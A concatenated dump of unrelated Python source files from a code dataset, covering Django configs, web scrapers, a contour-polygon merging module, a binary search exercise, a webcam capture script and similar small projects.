[VectorModelWithSeparateFeatureGeneration(model) for model in self.models]\n for fitter in fitters:\n intermediateStep = fitter.fitStart(X, Y)\n frameinfo = getframeinfo(currentframe())\n PickleFailureDebugger.logFailureIfEnabled(intermediateStep,\n contextInfo=f\"Submitting {fitter} in {frameinfo.filename}:{frameinfo.lineno}\")\n fittedModelFutures.append(executor.submit(intermediateStep.execute))\n for i, fittedModelFuture in enumerate(fittedModelFutures):\n self.models[i] = fitters[i].fitEnd(fittedModelFuture.result())\n\n def computeAllPredictions(self, X: pd.DataFrame):\n if self.numProcesses == 1 or len(self.models) == 1:\n return [model.predict(X) for model in self.models]\n\n predictionFutures = []\n executor = ProcessPoolExecutor(max_workers=self.numProcesses)\n predictors = [VectorModelWithSeparateFeatureGeneration(model) for model in self.models]\n for predictor in predictors:\n predictFinaliser = predictor.predictStart(X)\n frameinfo = getframeinfo(currentframe())\n PickleFailureDebugger.logFailureIfEnabled(predictFinaliser,\n contextInfo=f\"Submitting {predictFinaliser} in {frameinfo.filename}:{frameinfo.lineno}\")\n predictionFutures.append(executor.submit(predictFinaliser.execute))\n return [predictionFuture.result() for predictionFuture in predictionFutures]\n\n def _predict(self, x):\n predictionsDataFrames = self.computeAllPredictions(x)\n return self.aggregatePredictions(predictionsDataFrames)\n\n @abstractmethod\n def aggregatePredictions(self, predictionsDataFrames: List[pd.DataFrame]) -> pd.DataFrame:\n pass\n\n\nclass EnsembleRegressionVectorModel(EnsembleVectorModel, ABC):\n def isRegressionModel(self):\n return True\n\n\nclass EnsembleClassificationVectorModel(EnsembleVectorModel, ABC):\n def isRegressionModel(self):\n return False\n","sub_path":"src/sensai/ensemble/ensemble_base.py","file_name":"ensemble_base.py","file_ext":"py","file_size_in_byte":2997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"267398812","text":"from django.conf.urls import url,include\nfrom django.contrib import admin\nfrom .views import index\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^$',index,name='index'),\n url(r'^auth/',include('userauth.urls',namespace=\"auth\")),\n url(r'^dashboard/',include('dashboard.urls',namespace=\"dashboard\")),\n url(r'^hosts/',include('hosts.urls',namespace=\"hosts\")),\n url(r'^assets/',include('assets.urls',namespace=\"assets\")),\n url(r'^monitor/',include('monitor.urls',namespace=\"monitor\")),\n \n]\n","sub_path":"django/projects/django/myweb/myweb/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"370517763","text":"import sys\n\nimport matplotlib.pyplot as plt\n\ntry:\n from csc_486b_assignments.solution.assignment1 import utils\nexcept ModuleNotFoundError:\n import utils\n\n\nif __name__ == \"__main__\":\n k1 = int(sys.argv[1])\n k2 = int(sys.argv[2])\n\n img_inv = utils.read_image_from_h5(\"output.h5\")\n res = utils.find_difference_of_gaussian_blur(img_inv, k1, k2)\n\n plt.figure()\n plt.imshow(res, cmap=\"gray\")\n plt.show()\n\n utils.save_image_to_h5(res, \"filtered.h5\")\n","sub_path":"csc486b/a1/submission-package/solution_3_3.py","file_name":"solution_3_3.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"311409486","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nimport requests\nfrom bs4 import BeautifulSoup\n\n\n\n# Create your views here.\ndef player_scraping_view(request):\n player = request.GET.get('player') or \"Joe Flacco\"\n url = \"http://www.nfl.com/search?query={}\".format(player)\n content = requests.get(url).text\n souper = BeautifulSoup(content, \"html.parser\")\n data_table = souper.find(class_=\"stats\").attrs[\"href\"]\n content = requests.get(data_table).text\n souper = BeautifulSoup(content, \"html.parser\")\n player_stats = str(souper.find(id=\"main-content\"))\n return render(request,\"index.html\",{\"data_table\": data_table, \"player_stats\": player_stats})\n\n#def player_scraping_view(request):\n #player = request.GET.get('player') or \"Drew Brees\"\n #current_player = get_stats(player)\n #player_id = urlparse(current_player.attrs(\"href\")).query.strip(\"id\")\n #content = requests.get('http://www.nfl.com/player/drewbrees/2504775/profile')\n #souper = BeautifulSoup(content.text, \"html.parser\")\n #return render(request,\"index.html\",{\"current_player\": current_player,\"player\": player})\n","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"511870921","text":"from django.contrib import admin\nfrom django.contrib.auth.admin import UserAdmin\n\nfrom core.models import (CourseDetailHighlight, CourseInformationMapping,\n CourseSpotlight, Experience, InterestList,\n SavedFilter, SearchFilter, SearchSortOption,\n XDSConfiguration, XDSUIConfiguration, XDSUser)\n\n\n# Register your models here.\n@admin.register(XDSConfiguration)\nclass XDSConfigurationAdmin(admin.ModelAdmin):\n list_display = ('target_xis_metadata_api', 'created', 'modified',)\n fields = [('target_xis_metadata_api',)]\n\n\n@admin.register(XDSUIConfiguration)\nclass XDSUIConfigurationAdmin(admin.ModelAdmin):\n list_display = ('search_results_per_page', 'xds_configuration',\n 'created', 'modified',)\n fields = [('search_results_per_page', 'xds_configuration',\n 'course_img_fallback')]\n\n\n@admin.register(SearchFilter)\nclass SearchFilterAdmin(admin.ModelAdmin):\n list_display = ('display_name', 'field_name', 'xds_ui_configuration',\n 'filter_type', 'active', 'created', 'modified',)\n fields = [('display_name', 'field_name', 'xds_ui_configuration',\n 'filter_type', 'active',)]\n\n\n@admin.register(SearchSortOption)\nclass SearchSortOptionAdmin(admin.ModelAdmin):\n list_display = ('display_name', 'field_name', 'xds_ui_configuration',\n 'active', 'created', 'modified',)\n fields = [('display_name', 'field_name', 'xds_ui_configuration',\n 'active',)]\n\n\n@admin.register(CourseDetailHighlight)\nclass CourseDetailHighlightAdmin(admin.ModelAdmin):\n list_display = ('display_name', 'field_name', 'xds_ui_configuration',\n 'active', 'highlight_icon', 'rank', 'created', 'modified',)\n fields = [('display_name', 'field_name', 'xds_ui_configuration',\n 'active', 'highlight_icon', 'rank',)]\n\n\n@admin.register(CourseSpotlight)\nclass CourseSpotlightAdmin(admin.ModelAdmin):\n list_display = ('course_id', 'active',)\n\n\n@admin.register(CourseInformationMapping)\nclass CourseInformationMappingAdmin(admin.ModelAdmin):\n list_display = ('course_title', 'course_description',\n 'course_url', 'xds_ui_configuration')\n\n fields = ['course_title', 'course_description',\n 'course_url', 'xds_ui_configuration']\n\n\nclass XDSUserAdmin(UserAdmin):\n model = XDSUser\n search_fields = ('email', 'first_name',)\n list_filter = ('is_active', 'is_staff', 'is_superuser')\n ordering = ('-date_joined', '-last_login')\n list_display = ('email', 'first_name',\n 'is_active', 'is_staff', 'last_login')\n fieldsets = (\n (None, {'fields': ('email', 'first_name', 'last_name',)}),\n ('Permissions', {'fields': ('is_staff', 'is_active',)}),\n )\n add_fieldsets = (\n (None, {\n 'classes': ('wide',),\n 'fields': ('email', 'first_name', 'last_name',\n 'password1', 'password2', 'is_active', 'is_staff')}\n ),\n )\n\n\nadmin.site.register(XDSUser, XDSUserAdmin)\n\n\n@admin.register(Experience)\nclass ExperienceAdmin(admin.ModelAdmin):\n list_display = ('metadata_key_hash',)\n\n\n@admin.register(InterestList)\nclass InterestListAdmin(admin.ModelAdmin):\n list_display = ('owner', 'name', 'created', 'modified',)\n fields = ['owner', 'name', 'description', 'experiences']\n\n\n@admin.register(SavedFilter)\nclass SavedFilterAdmin(admin.ModelAdmin):\n list_display = ('owner', 'name', 'query', 'modified',)\n fields = ['owner', 'name', 'query']\n","sub_path":"app/core/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":3559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"423201265","text":"from django.urls import path\nfrom .views import *\n\napp_name = 'products'\n\nurlpatterns = [\n path('', HomeView.as_view(), name='home'),\n path(r'products///', ProductDetailView.as_view(), name='product_detail'),\n path(r'products//', CategoryDetailView.as_view(), name='category_detail'),\n path(r'search/', SearchView.as_view(), name='search')\n]\n","sub_path":"Lab3/products/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"50044963","text":"\n\nfrom xai.brain.wordbase.adjectives._prepay import _PREPAY\n\n#calss header\nclass _PREPAYS(_PREPAY, ):\n\tdef __init__(self,): \n\t\t_PREPAY.__init__(self)\n\t\tself.name = \"PREPAYS\"\n\t\tself.specie = 'adjectives'\n\t\tself.basic = \"prepay\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/adjectives/_prepays.py","file_name":"_prepays.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"369477934","text":"import numpy as np\nimport visu\nfrom collections import deque\nimport geometry as geo\nfrom classes import Node, Element\n\n\ndef add_contour_polygon(elmt, all_nodes, ct_low, ct_high):\n vectors = [all_nodes[nid].coords for nid in elmt.node_ids]\n vectors.append(vectors[0])\n\n ct_poly = []\n\n for v_1, v_2 in zip(vectors[:3], vectors[1:]):\n v_low, v_high = None, None\n\n if v_1[0] == v_2[0] and v_1[1] == v_2[1] and v_1[2] == v_2[2]:\n a = 1\n\n method = 0\n # 1) Edge not inside class.\n if min(v_1[2], v_2[2]) > ct_high or max(v_1[2], v_2[2]) < ct_low:\n continue\n\n # 2) Contour edge is on triangle edge. TODO: Solve that problem\n #elif v_1[2] == v_2[2]:\n # method = 2\n # v_high = v_1\n # v_low = v_2\n\n # 3) Edge completely inside class. Two new vertices will be created\n elif min(v_1[2], v_2[2]) < ct_low and max(v_1[2], v_2[2]) > ct_high:\n method = 3\n ratio_low = (ct_low - v_1[2]) / (v_2[2] - v_1[2])\n ratio_high = (ct_high - v_1[2]) / (v_2[2] - v_1[2])\n v_low = v_1 + ratio_low * (v_2 - v_1)\n v_high = v_1 + ratio_high * (v_2 - v_1)\n\n # 4) Edge surround class. Two vertices will be chosen\n elif min(v_1[2], v_2[2]) > ct_low and max(v_1[2], v_2[2]) < ct_high:\n method = 4\n #v_low = v_1 if v_1[2] < v_2[2] else v_2\n #v_high = v_2 if v_2[2] > v_1[2] else v_1\n v_low, v_high = v_1, v_2\n\n # 5) Lower vertex inside class. One new vertex will be created, the other will be chosen.\n elif min(v_1[2], v_2[2]) >= ct_low:\n method = 5\n ratio_high = (ct_high - v_1[2]) / (v_2[2] - v_1[2])\n v_low = v_1 if v_1[2] < v_2[2] else v_2\n v_high = v_1 + ratio_high * (v_2 - v_1)\n\n # 6) Higher vertex inside class. One new vertex will be created, the other will be chosen.\n elif max(v_1[2], v_2[2]) <= ct_high:\n method = 6\n ratio_low = (ct_low - v_1[2]) / (v_2[2] - v_1[2])\n v_low = v_1 + ratio_low * (v_2 - v_1)\n v_high = v_1 if v_1[2] > v_2[2] else v_2\n\n # Should not happen\n else:\n print(\"UNEXPECTED ERROR: THIS LINE OF CODE SHOULD NEVER BE REACHED (ERR01).\")\n\n # Adding points to new contour polygon\n if geo.dist(v_1, v_low) < geo.dist(v_1, v_high):\n ct_poly.append(v_low)\n ct_poly.append(v_high)\n else:\n ct_poly.append(v_high)\n ct_poly.append(v_low)\n\n if min(v_low[0], v_high[0]) < 0 or min(v_low[1], v_high[1]) < 0 :\n a = 1\n\n\n if len(ct_poly) > 0:\n # Check for follwing dublicates\n ct_poly_checked = [ct_poly[0]]\n for v in ct_poly[1:]:\n last = ct_poly_checked[-1]\n if geo.dist(v, last) > 0.00001:\n ct_poly_checked.append(v)\n if geo.dist(ct_poly_checked[0], ct_poly_checked[-1]) < 0.0001:\n ct_poly_checked = ct_poly_checked[:-1]\n\n #ct_poly.append(ct_poly[0])\n elmt.contour_polygons[ct_low] = np.array(ct_poly_checked)\n\n\ndef create_contour_polygons_for_each_element(elements, all_nodes, ct_values):\n for elmt in elements: # TODO: Embarrassingly Parallel -> implement\n for i in range(len(ct_values) - 1):\n add_contour_polygon(elmt, all_nodes, ct_low=ct_values[i], ct_high=ct_values[i + 1])\n\n\ndef merge_polygons_old(poly_a, poly_b):\n poly_a_id_1 = id(poly_a)\n\n rot_cnt_a = 0\n rot_cnt_b = 0\n match_found = False\n for i, a in enumerate(poly_a):\n for j, b in enumerate(poly_b):\n if geo.dist(a, b) < 0.001:\n rot_cnt_a = len(poly_a) - i - 1\n rot_cnt_b = len(poly_b) - j\n match_found = True\n break\n if match_found:\n break\n deq_a = deque(poly_a)\n deq_b = deque(poly_b)\n deq_a.rotate(rot_cnt_a)\n deq_b.rotate(rot_cnt_b)\n poly_a = list(deq_a)\n poly_b = list(deq_b)\n\n poly_a_id_2 = id(poly_a)\n #merged_polygon = poly_a + poly_b[1:-1] # TODO: Make it work when more than two same vertices\n merged_polygon = poly_a + poly_b\n\n # IMPORTANT CHECK BECAUSE OF ERRORS\n dubl_count = 0\n merged_polygon_new = [merged_polygon[0]]\n for i in range(1, len(merged_polygon)):\n if geo.dist(merged_polygon[i], merged_polygon_new[-1]) < 0.001:\n dubl_count += 1\n else:\n merged_polygon_new.append(merged_polygon[i])\n\n if geo.dist(merged_polygon_new[0], merged_polygon_new[-1]) < 0.001:\n merged_polygon_new = merged_polygon_new[:-1]\n dubl_count += 1\n\n if dubl_count > 0:\n a = 1\n merged_polygon = merged_polygon_new\n # CHECK ENDS HERE\n\n merged_polygon = np.array(merged_polygon)\n\n if merged_polygon is None:\n a = 1\n\n return merged_polygon\n\n\ndef merge_polygons_oldv2(poly_a, poly_b):\n plot = False\n if plot:\n visu.plot_polys(poly_a, poly_b)\n\n epsilon = 0.001\n\n dublicate_indices_a = []\n dublicate_indices_b = []\n dublicate_counter = 0\n for i, a in enumerate(poly_a):\n for j, b in enumerate(poly_b):\n if geo.dist(a, b) < epsilon:\n dublicate_counter += 1\n dublicate_indices_a.append(i)\n dublicate_indices_b.append(j)\n zero_ones_a = [False] * len(poly_a)\n zero_ones_b = [False] * len(poly_b)\n\n for i in dublicate_indices_a:\n zero_ones_a[i] = True\n for j in dublicate_indices_b:\n zero_ones_b[j] = True\n\n def get_rot_cnt(zero_ones, dubl_counter):\n if zero_ones[0] is True:\n true_cnt = 0\n for boolean in zero_ones:\n if boolean is True:\n true_cnt += 1\n elif boolean is False:\n return dubl_counter - true_cnt\n return 0\n elif zero_ones[0] is False:\n false_cnt = 0\n for boolean in zero_ones:\n if boolean is False:\n false_cnt += 1\n elif boolean is True:\n return len(zero_ones) - false_cnt\n\n rot_cnt_a = get_rot_cnt(zero_ones_a, dublicate_counter)\n rot_cnt_b = get_rot_cnt(zero_ones_b, dublicate_counter)\n\n deq_a = deque(poly_a)\n deq_b = deque(poly_b)\n\n deq_a.rotate(rot_cnt_a - 1) # minus one to delete the first entries later\n deq_b.rotate(rot_cnt_b)\n\n if dublicate_counter == len(poly_b):\n if dublicate_counter == 4:\n poly_a_list = list(poly_a)\n part1 = poly_a_list[dublicate_indices_a[0]:dublicate_indices_a[1]]\n part2 = [poly_a_list[dublicate_indices_a[3]], poly_a_list[dublicate_indices_a[2]]]\n part3 = poly_a_list[dublicate_indices_a[1]:]\n merged_polygon = part1 + part2 + part3\n return np.array(merged_polygon)\n else:\n return poly_a\n a = 1\n\n poly_a_rot = list(deq_a)[dublicate_counter-2:]\n poly_b_rot = list(deq_b)[dublicate_counter:]\n\n merged_polygon = np.array(poly_b_rot + poly_a_rot )\n\n return merged_polygon\n\n\ndef merge_polygons(poly_a, poly_b, nodes, elements, ct_val):\n plot = True\n if plot:\n visu.plot_contours_final(nodes, elements, {ct_val: [poly_a, poly_b]}, [ct_val])\n\n epsilon = 0.001\n\n dublicate_indices_a = []\n dublicate_indices_b = []\n dublicate_count = 0\n for i, a in enumerate(poly_a):\n for j, b in enumerate(poly_b):\n if geo.dist(a, b) < epsilon:\n dublicate_count += 1\n dublicate_indices_a.append(i)\n dublicate_indices_b.append(j)\n zero_ones_a = [False] * len(poly_a)\n zero_ones_b = [False] * len(poly_b)\n\n if dublicate_count == 0: # TODO: WHY??????\n return None\n elif len(dublicate_indices_b) == len(poly_b):\n return poly_a\n\n for i in dublicate_indices_a:\n zero_ones_a[i] = True\n for j in dublicate_indices_b:\n zero_ones_b[j] = True\n\n def get_rot_cnt(zero_ones, dubl_count):\n prev_bool = zero_ones[0]\n counter = 0\n for this_boolean in zero_ones[1:]:\n if prev_bool is True and this_boolean is False: # switch from true to false\n return -1 * counter\n prev_bool = this_boolean\n counter += 1\n return -1 * counter\n #counter = 0\n #for i, boolean in enumerate(zero_ones):\n # if boolean == True:\n # counter += 1\n # if counter == dubl_count:\n # return -1 * i\n\n rot_cnt_a = get_rot_cnt(zero_ones_a, dublicate_count)\n rot_cnt_b = get_rot_cnt(zero_ones_b, dublicate_count)\n\n deq_a = deque(poly_a)\n deq_b = deque(poly_b)\n\n deq_a.rotate(rot_cnt_a)\n deq_b.rotate(rot_cnt_b)\n\n poly_a_list = list(deq_a)\n poly_b_list = list(deq_b)\n\n if len(poly_b) == dublicate_count:\n merged_polygon = poly_a_list[:-(dublicate_count-2)]\n else:\n merged_polygon = poly_a_list[:-(dublicate_count-1)] + poly_b_list[:-(dublicate_count-1)]\n\n return np.array(merged_polygon)\n\n\ndef recursive_merging(elements, elmt, ct_val, merged_poly, nodes):\n plot = True\n neigh_elements = [elements[eid] for eid in elmt.neigh_elmt_ids\n if not elements[eid].merged]\n for nelmt in neigh_elements:\n if ct_val in nelmt.contour_polygons:\n if nelmt.merged:\n continue\n\n before_merged_poly = np.copy(merged_poly)\n merged_poly = merge_polygons(merged_poly, nelmt.contour_polygons[ct_val],\n nodes, elements, ct_val)\n if merged_poly is None: # can happend indeed\n return before_merged_poly\n nelmt.merged = True\n merged_poly = recursive_merging(elements, nelmt, ct_val, merged_poly, nodes)\n a = 1\n #if elmt.id == 8 and nelmt.id == 7:\n # return merged_poly\n #return merged_poly # TODO: correct?\n #else:\n # return merged_poly # TODO: Problem. Preemtive sending back\n return merged_poly\n\n\n# merging all ccw polygons\ndef merge_contour_polygons(elements, ct_values, nodes):\n ct_poly_dict = {}\n\n for ct_val in ct_values[:-1]:\n ct_poly_dict[ct_val] = []\n\n for elmt in elements:\n if elmt.merged:\n continue # TODO: Is that correct?\n\n merged_poly = []\n if ct_val in elmt.contour_polygons:\n merged_poly = elmt.contour_polygons[ct_val]\n elmt.merged = True\n merged_poly = recursive_merging(elements, elmt, ct_val, merged_poly, nodes)\n if merged_poly is not None:\n ct_poly_dict[ct_val].append(merged_poly)\n a = 1\n else:\n a = 1\n\n for elmt in elements:\n elmt.merged = False\n return ct_poly_dict\n","sub_path":"contouring.py","file_name":"contouring.py","file_ext":"py","file_size_in_byte":10953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"206835818","text":"\"\"\"Fichier main.urls.py définissant les urls.\"\"\"\nfrom django.conf.urls.static import static\nfrom django.conf import settings as main_settings\nfrom django.urls import path\nfrom .views import *\n\n\nurlpatterns = [\n path(\"\", index, name='index'),\n path('drone/', index, name='index1'),\n path('news/', detailed_article, name='detailed_article'),\n path('vols', vols, name='vols'),\n path('vols/', detailed_vol, name='detailed_vols'),\n path('confs', configurations, name='confs'),\n path('confs/', detailed_configuration, name='detailed_confs'),\n path('comps', composants, name='comps'),\n path('comps/', detailed_composant, name='detailed_comps'),\n] + static(main_settings.MEDIA_URL, document_root=main_settings.MEDIA_ROOT)\n","sub_path":"multisite/drone/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"2728462","text":"from django import forms\r\n\r\nCATEGORIES = (\r\n (20081, 'Antiques'),\r\n (550, 'Art'),\r\n (2984, 'Baby'),\r\n (267, 'Books, Comics & Magazines'),\r\n (12576, 'Business, Office & Industrial'),\r\n (625, 'Cameras & Photography'),\r\n (9800, 'Cars, Motorcycles & Vehicles'),\r\n (11450, 'Clothes, Shoes & Accessories'),\r\n (11116, 'Coins'),\r\n (1, 'Collectables'),\r\n (58058, 'Computers/Tablets & Networking'),\r\n (14339, 'Crafts'),\r\n (237, 'Dolls & Bears'),\r\n (11232, 'DVDs, Films & TV'),\r\n (1305, 'Events Tickets'),\r\n (159912, 'Garden & Patio'),\r\n (26395, 'Health & Beauty'),\r\n (3252, 'Holidays & Travel'),\r\n (11700, 'Home, Furniture & DIY'),\r\n (281, 'Jewellery & Watches'),\r\n (15032, 'Mobile Phones & Commmunication'),\r\n (11233, 'Music'),\r\n (619, 'Musical Instruments'),\r\n (1281, 'Pet Supplies'),\r\n (870, 'Pottery, Porcelain & Glass'),\r\n (10542, 'Property'),\r\n (293, 'Sound & Vision'),\r\n (888, 'Sporting Goods'),\r\n (64482, 'Sports Memorabilia'),\r\n (260, 'Stamps'),\r\n (220, 'Toys & Games'),\r\n (131090, 'Vehicle Parts & Accessories'),\r\n (1249, 'Video Games & Consoles'),\r\n (40005, 'Wholesale & Job Lots'),\r\n (99, 'Everything Else'),\r\n)\r\n\r\nclass SearchForm(forms.Form):\r\n categoryID = forms.ChoiceField(label=\"Category\", choices=CATEGORIES)\r\n query = forms.CharField(label=\"Search\", max_length=50)","sub_path":"search/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"587692503","text":"#!/usr/bin/python\nimport music21\nimport settings\nsBach = music21.corpus.parse('bach/bwv7.7')\nmf = music21.midi.translate.streamToMidiFile(sBach.parts[0])\nfilename = 'testBach'\nmf.open(settings.getMidiName(filename), 'wb')\nmf.write()\nmf.close()\n\n\n\n\n","sub_path":"srcbk/corp2midi.py","file_name":"corp2midi.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"618587777","text":"# coding: utf-8\r\n\r\n\r\n\r\n''' find är funktionen som hittar vilket tal du söker i listan genom att halvera sig närmare och närmare det sökta talet tills den\r\n hittar den. '''\r\ndef find(numbers, n): \r\n position = -1 # Detta gör så att ifall den inte hittar talet i listan så kan programet veta det\r\n higher = len(numbers) - 1\r\n lower = 0\r\n middle = 0 \r\n \r\n while higher >= lower: \r\n middle = (higher + lower) // 2\r\n if numbers[middle] == n: # Kollar om talet är mitt i mellan higher och lower och ifall den är har man hittat var den är\r\n position = middle + 1\r\n return position\r\n elif numbers[middle] < n: # Kollar om numret är större än halva\r\n lower = middle + 1\r\n elif numbers[middle] > n: # Kollar om numret är mindre än halva \r\n higher = middle - 1\r\n \r\n return position\r\n\r\n\r\n\r\n''' Denna funktion genererar en slumpmäsig lista genom att ta hur många element man ska ha och hur stor variation med nummer man\r\n ska ha, genom att kolla vilket nummer som är skrivit i numberSpan. '''\r\ndef generateList(element, numberSpan):\r\n import random\r\n numbers = []\r\n \r\n for z in range(0,element):\r\n randomNumber = random.randint(0,numberSpan)\r\n numbers.append(randomNumber)\r\n \r\n numbers.sort() # Sorterar listan så att den binära sökningen kan hitta den.\r\n return numbers\r\n\r\n\r\n\r\n''' Denna funktion är till för att göra det interaktivt och andvändarvänligt genom att fråga användaren vilket heltal dom vill söka,\r\n hur många olika heltal användaren vill ha i sin lista, och hur stort det slumpmässiga talen ska kunna bli. '''\r\ndef interactiv():\r\n print('-'*50)\r\n validInput = True\r\n errorText = 'Hoppsan! Det där var inte ett heltal, försök igen..'\r\n \r\n # Denna while loop loopar konstant tills den tar sig till en break, där den bara kan göra det ifall den hittar ett heltal.\r\n while not validInput:\r\n try:\r\n n = int(input('Skriv ditt heltal du vill hitta: '))\r\n break\r\n except ValueError:\r\n print(errorText) \r\n print('-'*50)\r\n while not validInput:\r\n try:\r\n element = int(input('Skriv in hur många heltal du vill generera: '))\r\n break\r\n except ValueError:\r\n print(errorText) \r\n print('-'*50)\r\n while not validInput:\r\n try:\r\n numberSpan = int(input('Skriv hur stort heltal du vill kunna generera: '))\r\n break\r\n except ValueError:\r\n print(errorText) \r\n runTestCode(n, element, numberSpan) \r\n \r\n\r\n\r\n''' Denna funktion är test kod för att kolla att programet fungerar samt kod för att göra det mer användarvänligt\r\n och lättare att förstå vad som hände och ifall talet andvändaren sökte fanns med i listan. '''\r\ndef runTestCode(n, element, numberSpan):\r\n print('-'*50)\r\n numbers = generateList(element, numberSpan)\r\n print(\"Din lista: \",numbers)\r\n print(\"Det sökta talet :\",n)\r\n position = find(numbers, n)\r\n \r\n if (position >= 0):\r\n print(n, \"Finns på plats\", position)\r\n else:\r\n print(n, \"finns inte med i listan\")\r\n\r\n\r\n\r\n''' runTestCode(n, element, numberSpan) där n är numret du vill hitta, element är mängden element, \r\n och numberSpan är variatoinen i nummer. '''\r\nrunTestCode(1, 20, 100)\r\nrunTestCode(9, 19, 99)\r\nrunTestCode(42, 14, 72)\r\ninteractiv()\r\n\r\n''' Fråga: Hur många jämförelser krävs för binär sökning för en lista med 1000 element? \r\n Svar: Binär sökning behöver 9 jämförelser med binär sökning '''","sub_path":"BinSearch.py","file_name":"BinSearch.py","file_ext":"py","file_size_in_byte":3657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"353957492","text":"import win32print\nimport win32ui\nfrom PIL import Image, ImageWin\nimport cv2\nimport numpy as np\nimport time\n\nglobal pic_countdown\npic_countdown = -1\ndef foo(event,x,y,flags,param):\n if event == cv2.EVENT_LBUTTONDOWN:\n global pic_countdown\n if pic_countdown == -1:\n pic_countdown = 10\n\n\n\nwindow_name = 'frame'\nfile_names = [\"filename_0.png\", \"filename_1.png\",\"filename_2.png\",\"filename_3.png\"]\ncam = cv2.VideoCapture(0)\nframe = np.zeros((512,512,3), np.uint8)\ncapture_index = 0\n\nfontface = cv2.FONT_HERSHEY_SIMPLEX\nfontscale = 1\nfontcolor = (255, 255, 255)\n\n\ncv2.namedWindow(window_name)\ncv2.imshow(window_name, frame)\ncv2.setMouseCallback(window_name, foo)\n\nwhile(True) :\n # Capture frame-by-frame\n ret, frame = cam.read()\n frame = cv2.flip(frame, 1)\n\n # Display the resulting frame\n if(0 < pic_countdown) :\n cv2.putText(frame,\"Ready?\" + str(pic_countdown), (100, 100), fontface, fontscale, fontcolor)\n pic_countdown = pic_countdown - 1\n elif(pic_countdown == 0):\n frame = cv2.flip(frame, 1)\n file_name = str(time.time()) + \".png\"\n cv2.imwrite(file_name, frame)\n pic_countdown = pic_countdown - 1\n else :\n cv2.putText(frame,\"Slaap\" + str(pic_countdown), (100,100), fontface, fontscale, fontcolor)\n\n cv2.imshow(window_name, frame)\n if cv2.waitKey(14) & 0xFF == ord('q'):\n break\n#\n# cv2.destroyAllWindows()\n# while(True):\n# ret, frame = cam.read()\n# if ret==True:\n# frame = cv2.flip(frame,0)\n# # write the flipped frame\n# cv2.imshow(window_name, frame)\n# cv2.setMouseCallback(window_name, foo)\n# else:\n# print('read failed')\n#\n# cv2.namedWindow(window_name)\n# cv2.setMouseCallback(window_name, foo)\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"431776389","text":"import requests\nimport bs4\nfrom datetime import datetime\n\nurl = 'https://habr.com/ru/all/'\npage = requests.get(url).text\nlike_hubs = {'JavaScript', 'Python'}\nsoup = bs4.BeautifulSoup(page, features='html.parser')\n\narticles = soup.find_all(class_=\"tm-articles-list__item\")\nfor article in articles:\n title = article.find(class_=\"tm-article-snippet__title tm-article-snippet__title_h2\").text\n href = url + article.find(class_=\"tm-article-snippet__title-link\").attrs['href']\n hubs = article.find_all(class_=\"tm-article-snippet__hubs-item-link\")\n hubs = {hub.find('span').text for hub in hubs}\n data_str = article.find(class_=\"tm-article-snippet__datetime-published\").find(\"time\").attrs['datetime']\n data = datetime.strptime(data_str, '%Y-%m-%dT%H:%M:%S.%fZ').date()\n if like_hubs & hubs:\n print(f'Дата публикации: {data},\\nНазвание статьи - \"{title}\", ссылка - {href}')\n\n\n\n","sub_path":"HW3/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"335765240","text":"from tastypie import fields\nfrom website.apps.api import UT8ModelResource\nfrom tastypie.authorization import DjangoAuthorization\nfrom tastypie.cache import SimpleCache\nfrom website.apps.lexicon.models import Word, Lexicon\n\nclass LexiconResource(UT8ModelResource):\n \n def determine_format(self, request):\n return 'application/json'\n \n class Meta:\n queryset = Lexicon.objects.all()\n allowed_methods = ['get']\n excludes = []\n cache = SimpleCache(timeout=10)\n authorization = DjangoAuthorization()\n\n\nclass WordResource(UT8ModelResource):\n \n def determine_format(self, request):\n return 'application/json'\n \n class Meta:\n queryset = Word.objects.all()\n allowed_methods = ['get']\n excludes = ['comment', 'quality', ]\n cache = SimpleCache(timeout=10)\n detail_uri_name = 'slug'\n","sub_path":"website/website/apps/lexicon/resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"438798850","text":"#open file for write\r\nf=open(\"file1.txt\",\"w\")\r\n\r\n#print (f)\r\nf.write('αβγδεζηθικλμνξοπρστ\\n')\r\nf.write('υφχψω123456789');\r\n\r\n#open file for read\r\nf=open('file1.txt','r')#diavazei mono apo to arxeio\r\n\r\n# pieces reading\r\nz=f.read()\r\nprint ('Αυτο ειναι το αρχειο 